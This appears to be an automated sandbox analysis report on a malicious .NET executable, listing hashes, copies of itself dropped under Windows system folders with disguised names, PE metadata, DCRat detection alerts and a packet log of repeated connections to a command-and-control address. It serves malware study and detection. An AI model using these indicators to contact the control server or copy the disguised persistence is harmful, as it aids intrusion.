SHA1:	D6B7E0E98B0BD964CE6B2256F7C3F52EA2EC39BA
SHA-256:	05C4814ADD59DF3A27D840A1494002AC0B0E49AA9348229BD9F438D87E3E56C1
SHA-512:	18B7AE05853BBE0109B3F00861B97951A7963036BBE021B3A2AE178C810257033E249613E522C3A4C16CEAA415F3358B8A052C28F321C6128228F38367991CC6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb................. ...6.......?... ...@....@.. ....................................@..................................?..K.................................................................................... ............... ..H............text........ ... .................. ..`.sdata.../...@...0...$..............@....rsrc................T..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Panther\setup.exe\0b15d056fd0733

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	163
Entropy (8bit):	5.717019470509937
Encrypted:	false
SSDEEP:	3:/8d3oLGdJwX/Mpzk7YB1x2a2P9S+LI7emRJ+kCuAqNpqQ32Yo0cxxTO3T0T:KQMm7YB1xyISqAqf9MS3Tq
MD5:	E78D8A7FF432BEC29FD7E6D10FD9CAF0
SHA1:	40133B44CB7CAF694733C94F23F538AA64C74954
SHA-256:	8547D81DFEB062A0A93B627B2BF06BB061C4EC1EA3BAC9BF233E4D9063BE657C
SHA-512:	1B9DCAB1F09CA56BD4CC73CB35070C814EB7E6C88A5E40636C390E97F42BEEA1F8C81509302B0E1806539B4099AE90885CC73D279B86F51781168969BFA8D086
Malicious:	false
Preview:	yk664GKQxb2Miogrz8eIUDRdZlg0fgh5JVA48E85VdtC1R5ysH8hsWzvSchSjTuQ47DMnmtu9ix1TPmHqrIYh9MwgPlggpVBsdH3NsKFYOhKj7bDzZm1LWt5uRqYBMNTNwI0Ht38hC9TbCNjyhrHDd0WuMI6CwEMAO6

C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1858048
Entropy (8bit):	7.419441703166268
Encrypted:	false
SSDEEP:	49152:DT+08U5LLZTm94oY5RMRyAhpXDQt1UJo:DT8EL4I5EfG
MD5:	5D232371C6B04BF6E609EE14FC06F3F6
SHA1:	D6B7E0E98B0BD964CE6B2256F7C3F52EA2EC39BA
SHA-256:	05C4814ADD59DF3A27D840A1494002AC0B0E49AA9348229BD9F438D87E3E56C1
SHA-512:	18B7AE05853BBE0109B3F00861B97951A7963036BBE021B3A2AE178C810257033E249613E522C3A4C16CEAA415F3358B8A052C28F321C6128228F38367991CC6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb................. ...6.......?... ...@....@.. ....................................@..................................?..K.................................................................................... ............... ..H............text........ ... .................. ..`.sdata.../...@...0...$..............@....rsrc................T..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\twain_32\91e168f4ec1147

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	245
Entropy (8bit):	5.791985976789841
Encrypted:	false
SSDEEP:	3:pyq7UTSEDJjzHtjvGhZHfNdEbgXrE/kUmAwRax36c52Emkmu1YOExW87AhqiVIXE:VoTSyPvGTfYgXrEjiy36X4TYVZmstFU
MD5:	239347DFE9162EEE12F77077DB8968DD
SHA1:	15856013BF408957FB8A62CEB4C4FCE02A8C336D
SHA-256:	05306169066769843E6174C70680E8601ED04AEB010A760F517A775AC4AF1147
SHA-512:	7055AB871B91645083F37C7198730901AE2AAC1462F9A7EE7DEE3394DB726E695DFA75E85B85B1E509F7EA8D912C54E5C7ED721FC7DA29C00BA6A8304FF86590
Malicious:	false
Preview:	Q57dm26XXMlsDO47a36Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7jzhX9GuRxlBfIGlSsrjkQEzVtxND5vrLDvQ5hG4CsqCfEoAvzvo6rdqfAMnM3rVC30bX0pulwg1kBTQFxbNKHudkEu5UcrIBUAlNMn5JACKKlGdq5iYcdL5JW1SFuaJEX0QBsD3KgDJEkS98RPY4TqhJFc0UUzZk3Fxu0c82pO5aB0iE1TyfBOvrSG5PMizrojLff

C:\Windows\twain_32\SgrmBroker.exe

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1858048
Entropy (8bit):	7.419441703166268
Encrypted:	false
SSDEEP:	49152:DT+08U5LLZTm94oY5RMRyAhpXDQt1UJo:DT8EL4I5EfG
MD5:	5D232371C6B04BF6E609EE14FC06F3F6
SHA1:	D6B7E0E98B0BD964CE6B2256F7C3F52EA2EC39BA
SHA-256:	05C4814ADD59DF3A27D840A1494002AC0B0E49AA9348229BD9F438D87E3E56C1
SHA-512:	18B7AE05853BBE0109B3F00861B97951A7963036BBE021B3A2AE178C810257033E249613E522C3A4C16CEAA415F3358B8A052C28F321C6128228F38367991CC6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb................. ...6.......?... ...@....@.. ....................................@..................................?..K.................................................................................... ............... ..H............text........ ... .................. ..`.sdata.../...@...0...$..............@....rsrc................T..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\twain_32\SgrmBroker.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\jmBb9uY1B8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.419441703166268
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	jmBb9uY1B8.exe
File size:	1'858'048 bytes
MD5:	5d232371c6b04bf6e609ee14fc06f3f6
SHA1:	d6b7e0e98b0bd964ce6b2256f7c3f52ea2ec39ba
SHA256:	05c4814add59df3a27d840a1494002ac0b0e49aa9348229bd9f438d87e3e56c1
SHA512:	18b7ae05853bbe0109b3f00861b97951a7963036bbe021b3a2ae178c810257033e249613e522c3a4c16ceaa415f3358b8a052c28f321c6128228f38367991cc6
SSDEEP:	49152:DT+08U5LLZTm94oY5RMRyAhpXDQt1UJo:DT8EL4I5EfG
TLSH:	B185AD027E44CE22F01D5633C2EF454C87B0A85166A6E72B7DBA376E55123A73C0D9EB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb................. ...6.......?... ...@....@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x5c3fce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6272A3D7 [Wed May 4 16:03:35 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push eax
add byte ptr [eax], al
add byte ptr [01000000h], al
add byte ptr [eax], al
add byte ptr [edi+00h], dl
add byte ptr [eax], al
add eax, 01000000h
add dword ptr [eax], eax
add byte ptr [ebx+00h], dl
add byte ptr [eax], al
add eax, 11000000h
add byte ptr [eax], al
add byte ptr [ebx+00h], bl
add byte ptr [eax], al
add eax, 01000000h
adc byte ptr [eax], al
add byte ptr [ecx+00h], dl
add byte ptr [eax], al
add eax, 05000000h
add byte ptr [eax], al
add byte ptr [ecx+00h], bl
add byte ptr [eax], al
add eax, 01000000h
add al, 00h
add byte ptr [ebp+00h], dl
add byte ptr [eax], al
add eax, 41000000h
add byte ptr [eax], al
add byte ptr [ebp+00h], bl
add byte ptr [eax], al
add eax, 01000000h
inc eax
add byte ptr [eax], al
push eax
add byte ptr [eax], al
add byte ptr [03000000h], al
add byte ptr [eax], al
add byte ptr [eax+00h], bl
add byte ptr [eax], al
add eax, 01000000h
add al, byte ptr [eax]
add byte ptr [eax+eax+00h], dl
add byte ptr [21000000h], al
add byte ptr [eax], al
add byte ptr [eax+eax+00h], bl
add byte ptr [01000000h], al
and byte ptr [eax], al
add byte ptr [edx+00h], dl
add byte ptr [eax], al
add eax, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1c3f80	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1c8000	0x218	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1ca000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1c1fd4	0x1c2000	42de9f759abf39d68d9132733c99bf87	False	0.7773920355902778	data	7.442492770747193	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0x1c4000	0x2fdf	0x3000	e1395032754f6816c014245e38d89b77	False	0.3104654947916667	data	3.242042523574806	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1c8000	0x218	0x400	61e8143cdd911255247b331122f09e9c	False	0.26171875	data	1.8344366501290008	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1ca000	0xc	0x200	27b70b2e8ca6db4c4cce9884cabbb706	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1c8058	0x1c0	ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970	English	United States	0.5223214285714286

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-05T18:57:05.858307+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.4	49739	5.101.152.15	80	TCP
2025-01-05T18:57:52.937988+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	5.101.152.15	80	192.168.2.4	49750	TCP
2025-01-05T18:59:20.434384+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	5.101.152.15	80	192.168.2.4	50031	TCP
2025-01-05T19:00:36.572534+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	5.101.152.15	80	192.168.2.4	50044	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 18:57:04.981431007 CET	49739	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:04.986248970 CET	80	49739	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:04.987418890 CET	49739	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:04.988123894 CET	49739	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:04.992948055 CET	80	49739	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:05.857100010 CET	80	49739	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:05.857121944 CET	80	49739	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:05.858306885 CET	49739	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:05.987227917 CET	49739	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:05.992373943 CET	80	49739	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:06.163326979 CET	49740	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:06.168240070 CET	80	49740	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:06.169007063 CET	49740	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:06.170741081 CET	49740	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:06.175669909 CET	80	49740	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:06.175740004 CET	80	49740	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:06.208755016 CET	49739	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:06.213650942 CET	80	49739	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:06.220690966 CET	80	49739	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:06.284698963 CET	49739	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:06.447065115 CET	80	49739	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:06.450741053 CET	49739	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:06.461841106 CET	80	49739	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:06.502094984 CET	80	49739	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:06.684520960 CET	80	49739	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:06.890084028 CET	49739	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:06.936717033 CET	80	49740	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:07.111769915 CET	49740	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:11.946866989 CET	49739	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:11.947753906 CET	49743	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:11.950134039 CET	49740	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:11.952155113 CET	80	49739	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:11.952224016 CET	49739	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:11.952606916 CET	80	49743	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:11.952680111 CET	49743	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:11.952850103 CET	49743	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:11.955101967 CET	80	49740	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:11.955163002 CET	49740	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:11.957668066 CET	80	49743	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:11.957683086 CET	80	49743	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:11.957694054 CET	80	49743	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:13.245193005 CET	80	49743	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:13.299436092 CET	49743	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:18.271385908 CET	49745	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:18.276380062 CET	80	49745	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:18.276451111 CET	49745	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:18.276588917 CET	49745	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:18.281450987 CET	80	49745	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:18.281462908 CET	80	49745	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:18.281471968 CET	80	49745	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:19.039251089 CET	80	49745	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:19.082171917 CET	49745	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:20.697869062 CET	49743	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:24.051506042 CET	49745	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:24.052242041 CET	49746	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:24.056581974 CET	80	49745	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:24.056631088 CET	49745	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:24.057080030 CET	80	49746	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:24.057151079 CET	49746	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:24.057284117 CET	49746	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:24.062088013 CET	80	49746	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:24.062098026 CET	80	49746	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:24.062105894 CET	80	49746	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:24.794070959 CET	80	49746	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:24.847786903 CET	49746	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:29.802012920 CET	49746	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:29.802784920 CET	49747	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:29.807260990 CET	80	49746	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:29.807499886 CET	49746	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:29.807570934 CET	80	49747	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:29.807626009 CET	49747	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:29.807755947 CET	49747	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:29.812602043 CET	80	49747	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:29.812613010 CET	80	49747	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:29.812621117 CET	80	49747	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:30.567229033 CET	80	49747	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:30.613399982 CET	49747	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:35.582726002 CET	49747	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:35.583354950 CET	49748	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:35.587805033 CET	80	49747	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:35.587867975 CET	49747	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:35.588237047 CET	80	49748	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:35.588308096 CET	49748	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:35.588427067 CET	49748	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:35.593245983 CET	80	49748	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:35.593257904 CET	80	49748	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:35.593269110 CET	80	49748	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:36.346798897 CET	80	49748	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:36.394635916 CET	49748	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:41.348690987 CET	49748	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:41.349224091 CET	49749	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:41.353800058 CET	80	49748	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:41.353847980 CET	49748	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:41.354058027 CET	80	49749	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:41.354119062 CET	49749	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:41.354269028 CET	49749	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:41.359097958 CET	80	49749	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:41.359107971 CET	80	49749	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:41.359118938 CET	80	49749	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:42.138269901 CET	80	49749	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:42.191494942 CET	49749	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:47.145210028 CET	49749	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:47.145859957 CET	49750	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:47.150604010 CET	80	49749	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:47.150681019 CET	49749	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:47.150724888 CET	80	49750	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:47.150804043 CET	49750	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:47.150926113 CET	49750	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:47.155735016 CET	80	49750	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:47.155889034 CET	80	49750	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:47.155916929 CET	80	49750	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:47.919193983 CET	80	49750	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:47.972752094 CET	49750	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:52.932842970 CET	49750	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:52.937988043 CET	80	49750	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:52.938071966 CET	49750	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:52.944525003 CET	49752	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:52.949366093 CET	80	49752	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:52.949448109 CET	49752	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:52.952296972 CET	49752	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:52.957159996 CET	80	49752	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:52.957170010 CET	80	49752	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:52.957179070 CET	80	49752	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:53.711931944 CET	80	49752	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:53.753984928 CET	49752	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:58.723474026 CET	49752	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:58.724102020 CET	49769	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:58.728585005 CET	80	49752	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:58.728944063 CET	80	49769	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:58.728980064 CET	49752	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:58.729054928 CET	49769	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:58.729170084 CET	49769	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:57:58.733946085 CET	80	49769	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:58.734065056 CET	80	49769	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:58.734083891 CET	80	49769	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:59.487900019 CET	80	49769	5.101.152.15	192.168.2.4
Jan 5, 2025 18:57:59.535324097 CET	49769	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:04.489062071 CET	49769	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:04.489799976 CET	49810	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:04.494065046 CET	80	49769	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:04.494138956 CET	49769	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:04.494642019 CET	80	49810	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:04.494715929 CET	49810	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:04.494857073 CET	49810	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:04.499672890 CET	80	49810	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:04.499685049 CET	80	49810	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:04.499696970 CET	80	49810	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:05.231141090 CET	80	49810	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:05.285233021 CET	49810	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:10.239582062 CET	49810	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:10.244746923 CET	80	49810	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:10.246082067 CET	49810	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:10.246928930 CET	49844	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:10.252525091 CET	80	49844	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:10.252604008 CET	49844	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:10.255088091 CET	49844	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:10.260176897 CET	80	49844	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:10.260186911 CET	80	49844	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:10.260195971 CET	80	49844	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:11.140255928 CET	80	49844	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:11.191468000 CET	49844	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:16.144970894 CET	49844	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:16.145651102 CET	49878	80	192.168.2.4	5.101.152.15
